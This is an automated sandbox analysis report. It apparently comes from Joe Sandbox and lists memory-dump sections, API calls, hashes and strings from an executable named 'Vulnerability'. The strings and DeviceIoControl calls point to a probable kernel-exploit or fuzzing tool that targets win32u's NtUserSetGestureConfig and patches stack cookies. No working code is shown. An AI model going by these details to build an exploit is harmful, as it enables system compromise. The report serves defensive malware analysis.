                                                    • Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd
                                                    Similarity
                                                    • API ID: ControlDeviceV01@$??6?$basic_ostream@AddressD@std@@@std@@HandleModuleProcU?$char_traits@V01@@
                                                    • String ID: 0$NtUserSetGestureConfig$[-] Failed to get export win32u.NtUserSetGestureConfig$[-] Failed to load win32u.dll$win32u.dll
                                                    • API String ID: 2058718191-1835519504
                                                    • Opcode ID: 10fecf31a859fb0784b16addc07fe4d4259dd89a3fcb524d2f7f5ce2d8d455a0
                                                    • Instruction ID: 45c500df0e34bc05ee498ca3e95622ffbd3594014555ed7742137f7abba553d0
                                                    • Opcode Fuzzy Hash: 10fecf31a859fb0784b16addc07fe4d4259dd89a3fcb524d2f7f5ce2d8d455a0
                                                    • Instruction Fuzzy Hash: 34516B36B38B4299EB50EB60E4402A9B3A5FB58788F944236DE4D27754DF3DE129C360
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true
                                                    • Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd
                                                    Similarity
                                                    • API ID: ControlDeviceV01@$??6?$basic_ostream@AddressD@std@@@std@@HandleModuleProcU?$char_traits@V01@@
                                                    • String ID: 0$NtUserSetGestureConfig$[-] Failed to get export win32u.NtUserSetGestureConfig$[-] Failed to load win32u.dll$win32u.dll
                                                    • API String ID: 2058718191-1835519504
                                                    • Opcode ID: 49e05e6e27818643180f4c41f14648222a82f7cdd346229aee826967f148f0fc
                                                    • Instruction ID: 9a25d1902b9cd23d3e9bc154f59bf8d09846a90006a70e0f359ac5f33e72251c
                                                    • Opcode Fuzzy Hash: 49e05e6e27818643180f4c41f14648222a82f7cdd346229aee826967f148f0fc
                                                    • Instruction Fuzzy Hash: 6B518237B38B4299EB41AB61E4502A9B3B0FB58788F844236DD4D27758DF3DD129C760
                                                    APIs
                                                    • GetModuleHandleA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00007FF7738EAA6F
                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00007FF7738EAA97
                                                    • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00007FF7738EAAD1
                                                    • DeviceIoControl.KERNEL32 ref: 00007FF7738EAB5B
                                                    • DeviceIoControl.KERNEL32 ref: 00007FF7738EAC0D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true
                                                    • Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd
                                                    Similarity
                                                    • API ID: ControlDeviceV01@$??6?$basic_ostream@AddressD@std@@@std@@HandleModuleProcU?$char_traits@V01@@
                                                    • String ID: 0$NtUserSetGestureConfig$[-] Failed to get export win32u.NtUserSetGestureConfig$[-] Failed to load win32u.dll$win32u.dll
                                                    • API String ID: 2058718191-1835519504
                                                    • Opcode ID: e56c557f4cb72457ffedcb1744ed334bc5d3eec3eedd5975bbbc8a90c62d70b0
                                                    • Instruction ID: fa2fde87eee0f4c69121dc3ff1d6e573eae053d08605dfa8b83b94455a5e543a
                                                    • Opcode Fuzzy Hash: e56c557f4cb72457ffedcb1744ed334bc5d3eec3eedd5975bbbc8a90c62d70b0
                                                    • Instruction Fuzzy Hash: AC515F33A38B4299E7409F21E8506A9B3A4FB48788F944236DE4D27718DF3DD265C360
                                                    APIs
                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738EE79D
                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738EE7D6
                                                      • Part of subcall function 00007FF7738EA3C0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7738EA43A
                                                      • Part of subcall function 00007FF7738EA3C0: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF7738EA45A
                                                      • Part of subcall function 00007FF7738EA3C0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7738EA46A
                                                      • Part of subcall function 00007FF7738EA3C0: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7738EA54D
                                                      • Part of subcall function 00007FF7738EA3C0: ?uncaught_exception@std@@YA_NXZ.MSVCP140 ref: 00007FF7738EA554
                                                      • Part of subcall function 00007FF7738EA3C0: ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF7738EA561
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true
                                                    • Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd
                                                    Similarity
                                                    • API ID: V01@$D@std@@@std@@U?$char_traits@$??6?$basic_ostream@?good@ios_base@std@@U?$char_traits@_V01@@W@std@@@std@@$?flush@?$basic_ostream@_?setstate@?$basic_ios@?uncaught_exception@std@@Osfx@?$basic_ostream@_V12@
                                                    • String ID: [+] Fixing stack cookie$[+] Load config directory wasn't found, probably StackCookie not defined, fix cookie skipped$[+] StackCookie not defined, fix cookie skipped$[-] StackCookie already fixed!? this probably wrong
                                                    • API String ID: 310790477-4185774449
                                                    • Opcode ID: 76421350983320ce6da76d74966c43a37aff2320e7713b4787a093d58551255b
                                                    • Instruction ID: 79eb2249d3c17b7981e88b0ff1971d2c86396d1ae79ca0557095a991095d5038
                                                    • Opcode Fuzzy Hash: 76421350983320ce6da76d74966c43a37aff2320e7713b4787a093d58551255b
                                                    • Instruction Fuzzy Hash: 82315026F79B4381EA80AB15E890068E361BF98F80FC42236D94D27714DF3EE565C730
                                                    APIs
                                                    • memset.VCRUNTIME140 ref: 00007FF7738E1B68
                                                      • Part of subcall function 00007FF7738E9790: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF7738E97CC
                                                      • Part of subcall function 00007FF7738E9790: ??0?$basic_istream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140 ref: 00007FF7738E97EB
                                                      • Part of subcall function 00007FF7738E9790: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF7738E981D
                                                      • Part of subcall function 00007FF7738E9790: ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF7738E9838
                                                      • Part of subcall function 00007FF7738E9790: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7738E9883
                                                    • ?tellg@?$basic_istream@DU?$char_traits@D@std@@@std@@QEAA?AV?$fpos@U_Mbstatet@@@2@XZ.MSVCP140 ref: 00007FF7738E1B8F
                                                    • ?seekg@?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@_JH@Z.MSVCP140 ref: 00007FF7738E1BA9
                                                    • memset.VCRUNTIME140 ref: 00007FF7738E1C2B
                                                    • ?read@?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@PEAD_J@Z.MSVCP140 ref: 00007FF7738E1C4A
                                                    • ??Bios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7738E1C5D
                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738E1CCA
                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738E1D25
                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738E1D77
                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7738E1E0E
                                                      • Part of subcall function 00007FF7738F4108: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF7738ECF43,?,?,?,?,?,0000000100000000,00007FF7738E99B2), ref: 00007FF7738F4122
                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738E1E07
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true
                                                    • Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd
                                                    Similarity
                                                    • API ID: U?$char_traits@$D@std@@@std@@$_invalid_parameter_noinfo_noreturn$memset$??0?$basic_ios@??0?$basic_istream@??0?$basic_streambuf@?read@?$basic_istream@?seekg@?$basic_istream@?setstate@?$basic_ios@?tellg@?$basic_istream@Bios_base@std@@Concurrency::cancel_current_taskD@std@@@1@_Init@?$basic_streambuf@Mbstatet@@@2@V12@V12@_V?$basic_streambuf@V?$fpos@malloc
                                                    • String ID:
                                                    • API String ID: 853152473-0
                                                    • Opcode ID: d155e4fa32cb25b87424030fbd96bb5612ec5f3f14f6f8518e1b0f186dfb07eb
                                                    • Instruction ID: 55b1340b0476cece407e94265cef48a1042992128702bad47c2102d2f49eb65d
                                                    • Opcode Fuzzy Hash: d155e4fa32cb25b87424030fbd96bb5612ec5f3f14f6f8518e1b0f186dfb07eb
                                                    • Instruction Fuzzy Hash: 3971E423B78A8241EA50EB25E4443BDE361EB95BD0F845331DA9D22AD6DF3ED494C330
                                                    APIs
                                                    • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7738EA839
                                                    • ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF7738EA859
                                                    • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7738EA869
                                                    • ?getloc@ios_base@std@@QEBA?AVlocale@2@XZ.MSVCP140 ref: 00007FF7738EA894
                                                      • Part of subcall function 00007FF7738ECAF0: ??0_Lockit@std@@QEAA@H@Z.MSVCP140 ref: 00007FF7738ECB1D
                                                      • Part of subcall function 00007FF7738ECAF0: ??Bid@locale@std@@QEAA_KXZ.MSVCP140 ref: 00007FF7738ECB37
                                                      • Part of subcall function 00007FF7738ECAF0: ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12@XZ.MSVCP140 ref: 00007FF7738ECB69
                                                      • Part of subcall function 00007FF7738ECAF0: ?_Getcat@?$ctype@_W@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@@Z.MSVCP140 ref: 00007FF7738ECB94
                                                      • Part of subcall function 00007FF7738ECAF0: std::_Facet_Register.LIBCPMT ref: 00007FF7738ECBAD
                                                      • Part of subcall function 00007FF7738ECAF0: ??1_Lockit@std@@QEAA@XZ.MSVCP140 ref: 00007FF7738ECBCC
                                                    • ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z.MSVCP140 ref: 00007FF7738EA906
                                                    • ?widen@?$ctype@_W@std@@QEBA_WD@Z.MSVCP140 ref: 00007FF7738EA94E
                                                    • ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z.MSVCP140 ref: 00007FF7738EA95C
                                                    • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7738EA9E6
                                                    • ?uncaught_exception@std@@YA_NXZ.MSVCP140 ref: 00007FF7738EA9ED
                                                    • ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF7738EA9FA
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true
                                                    • Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd
                                                    Similarity
                                                    • API ID: U?$char_traits@_W@std@@@std@@$?good@ios_base@std@@?sputc@?$basic_streambuf@_Lockit@std@@W@std@@$??0_??1_?flush@?$basic_ostream@_?getloc@ios_base@std@@?setstate@?$basic_ios@?uncaught_exception@std@@?widen@?$ctype@_Bid@locale@std@@D@std@@@std@@Facet_Getcat@?$ctype@_Getgloballocale@locale@std@@Locimp@12@Osfx@?$basic_ostream@_RegisterU?$char_traits@V12@V42@@Vfacet@locale@2@Vlocale@2@std::_
                                                    • String ID:
                                                    • API String ID: 2572325179-0
                                                    • Opcode ID: 54dcea9817dc5dd54c328895e64cfbe9d62cefc45a86fb8b743e8bef97b499c3
                                                    • Instruction ID: 4f8e6f10702bf3e1b89bd2fbe076adbf5f6f27bbbb6d27d5df58aa59ab04920a
                                                    • Opcode Fuzzy Hash: 54dcea9817dc5dd54c328895e64cfbe9d62cefc45a86fb8b743e8bef97b499c3
                                                    • Instruction Fuzzy Hash: 6A617223669A4181EBA0EF19E490239E7A0FF94F95F55C232CE8E57760CF3ED4568320
                                                    APIs
                                                      • Part of subcall function 00007FF7738F0B10: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738F0C0C
                                                    • _CxxThrowException.VCRUNTIME140 ref: 00007FF7738F12D3
                                                    • ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@P6AAEAVios_base@1@AEAV21@@Z@Z.MSVCP140 ref: 00007FF7738F1330
                                                    • ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@K@Z.MSVCP140 ref: 00007FF7738F133E
                                                    • ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@PEBX@Z.MSVCP140 ref: 00007FF7738F1311
                                                      • Part of subcall function 00007FF7738EA3C0: ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z.MSVCP140 ref: 00007FF7738EA4B7
                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF7738F1363
                                                      • Part of subcall function 00007FF7738EA3C0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7738EA43A
                                                      • Part of subcall function 00007FF7738EA3C0: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF7738EA45A
                                                      • Part of subcall function 00007FF7738EA3C0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7738EA46A
                                                      • Part of subcall function 00007FF7738EA3C0: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7738EA54D
                                                      • Part of subcall function 00007FF7738EA3C0: ?uncaught_exception@std@@YA_NXZ.MSVCP140 ref: 00007FF7738EA554
                                                      • Part of subcall function 00007FF7738EA3C0: ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF7738EA561
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true
                                                    • Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd
                                                    Similarity
                                                    • API ID: U?$char_traits@_W@std@@@std@@$V01@$??6?$basic_ostream@_$?good@ios_base@std@@D@std@@@std@@U?$char_traits@$??6?$basic_ostream@?flush@?$basic_ostream@_?setstate@?$basic_ios@?sputc@?$basic_streambuf@_?uncaught_exception@std@@ExceptionOsfx@?$basic_ostream@_ThrowV01@@V12@V21@@Vios_base@1@_invalid_parameter_noinfo_noreturn
                                                    • String ID: by 0x$[!!] Crash$[!!] Crash at addr 0x$exists
                                                    • API String ID: 4130559589-3783130642
                                                    • Opcode ID: 64d6d70040ea94b76b8b4b3888ea386c72d250b599749e752533fb1393f8f53c
                                                    • Instruction ID: 2d5e65aeb775fad35b40b908050a165c992ea117e063cd42b791ebcb6f025df5
                                                    • Opcode Fuzzy Hash: 64d6d70040ea94b76b8b4b3888ea386c72d250b599749e752533fb1393f8f53c
                                                    • Instruction Fuzzy Hash: 18218552A38A4791EE84FB25E8502B9E320FFA4B44FC45131D94D27655EF3EE164C730
                                                    APIs
                                                    • __std_fs_code_page.MSVCPRT ref: 00007FF7738F0C9F
                                                      • Part of subcall function 00007FF7738F3948: ___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,?,00007FF7738F0CA4), ref: 00007FF7738F394C
                                                      • Part of subcall function 00007FF7738F3948: AreFileApisANSI.KERNEL32(?,?,?,?,00007FF7738F0CA4), ref: 00007FF7738F395B
                                                    • memmove.VCRUNTIME140 ref: 00007FF7738F0D6F
                                                    • memmove.VCRUNTIME140 ref: 00007FF7738F0E4F
                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738F0E5F
                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738F0EDD
                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7738F0F2B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true
                                                    • Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo_noreturn$memmove$ApisFile___lc_codepage_func__std_fs_code_page
                                                    • String ID: ", "$: "
                                                    • API String ID: 3155750461-747220369
                                                    • Opcode ID: fee7c37069f084fdb3fcbd432b07c9ad3f7f9eaf3580db1ef9395aa38425d06b
                                                    • Instruction ID: 74949b5aed591357aad1595019420e227a4e9817261c6b0bf4585847cba12229
                                                    • Opcode Fuzzy Hash: fee7c37069f084fdb3fcbd432b07c9ad3f7f9eaf3580db1ef9395aa38425d06b
                                                    • Instruction Fuzzy Hash: 9F91A163B24B4289EB40EF65E4403BCE361EB58B88F804531DE5D67B99DF3AD564C360
                                                    APIs
                                                    • ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,00000000,?,00000000,?,00007FF7738EEA7F,?,?,00000000,00000000,?,00007FF7738EE399), ref: 00007FF7738EEF19
                                                    • ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140(?,?,00000000,00000000,?,00007FF7738EE399), ref: 00007FF7738EEF39
                                                    • ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,?,00000000,00000000,?,00007FF7738EE399), ref: 00007FF7738EEF49
                                                    • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,?,00000000,00000000,?,00007FF7738EE399), ref: 00007FF7738EEF96
                                                    • ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140(?,?,00000000,00000000,?,00007FF7738EE399), ref: 00007FF7738EEFBD
                                                    • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,?,00000000,00000000,?,00007FF7738EE399), ref: 00007FF7738EEFDE
                                                    • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140(?,?,00000000,00000000,?,00007FF7738EE399), ref: 00007FF7738EF024
                                                    • ?uncaught_exception@std@@YA_NXZ.MSVCP140(?,?,00000000,00000000,?,00007FF7738EE399), ref: 00007FF7738EF02B
                                                    • ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140(?,?,00000000,00000000,?,00007FF7738EE399), ref: 00007FF7738EF038
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true
                                                    • Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd
                                                    Similarity
                                                    • API ID: D@std@@@std@@U?$char_traits@$?good@ios_base@std@@?sputc@?$basic_streambuf@U?$char_traits@_W@std@@@std@@$?flush@?$basic_ostream@_?setstate@?$basic_ios@?sputn@?$basic_streambuf@?uncaught_exception@std@@Osfx@?$basic_ostream@_V12@
                                                    • String ID:
                                                    • API String ID: 3858555242-0
                                                    • Opcode ID: 6bc19da90b3a22a95d9b41eedf678c2b399e3105eb9b11cf846f221ea2204440
                                                    • Instruction ID: 45e8a611fdb124b676c31509b3c62687ee3b15bb08e407185f8eddf1930267fd
                                                    • Opcode Fuzzy Hash: 6bc19da90b3a22a95d9b41eedf678c2b399e3105eb9b11cf846f221ea2204440
                                                    • Instruction Fuzzy Hash: CB515633669A4182EBA09F19E490238E760EF94FD1F55C632DE5E537A0CF3EE4568320
                                                    APIs
                                                    • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7738ED5FB
                                                    • ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF7738ED61B
                                                    • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF7738ED62B
                                                    • ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z.MSVCP140 ref: 00007FF7738ED678
                                                    • ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140 ref: 00007FF7738ED6A6
                                                    • ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W@Z.MSVCP140 ref: 00007FF7738ED6C7
                                                    • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7738ED70E
                                                    • ?uncaught_exception@std@@YA_NXZ.MSVCP140 ref: 00007FF7738ED715
                                                    • ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF7738ED722
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2106234372.00007FF7738E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7738E0000, based on PE: true
                                                    • Associated: 00000005.00000002.2106222280.00007FF7738E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106250538.00007FF7738F6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106265208.00007FF773903000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000005.00000002.2106277089.00007FF773904000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ff7738e0000_Vulnerability.jbxd
                                                    Similarity
                                                    • API ID: U?$char_traits@_W@std@@@std@@$?good@ios_base@std@@?sputc@?$basic_streambuf@_D@std@@@std@@U?$char_traits@$?flush@?$basic_ostream@_?setstate@?$basic_ios@?sputn@?$basic_streambuf@?uncaught_exception@std@@Osfx@?$basic_ostream@_V12@
                                                    • String ID:
                                                    • API String ID: 1082002092-0
                                                    • Opcode ID: 6755a856d871fba1efbdf4653af67588a1488c608911402bc09cbd1524d65175
                                                    • Instruction ID: d9a98a146fbc7c2b16ccd6f11e513be0e4b8c5861dd2d1ebf01b87a048c6b9cf
                                                    • Opcode Fuzzy Hash: 6755a856d871fba1efbdf4653af67588a1488c608911402bc09cbd1524d65175
                                                    • Instruction Fuzzy Hash: 11517333628A4185EBA0AF09E580338E760FF94F85F598632DE4E57760CF3ED45A8360
                                                    APIs
                                                    • ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,00007FF7738E1E19), ref: 00007FF7738ED435
                                                    • ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,00007FF7738E1E19), ref: 00007FF7738ED455
                                                    • ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,00007FF7738E1E19), ref: 00007FF7738ED465
                                                    • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,00007FF7738E1E19), ref: 00007FF7738ED4AC
                                                    • ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,00007FF7738E1E19), ref: 00007FF7738ED4D9
                                                    • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,00007FF7738E1E19), ref: 00007FF7738ED4FA
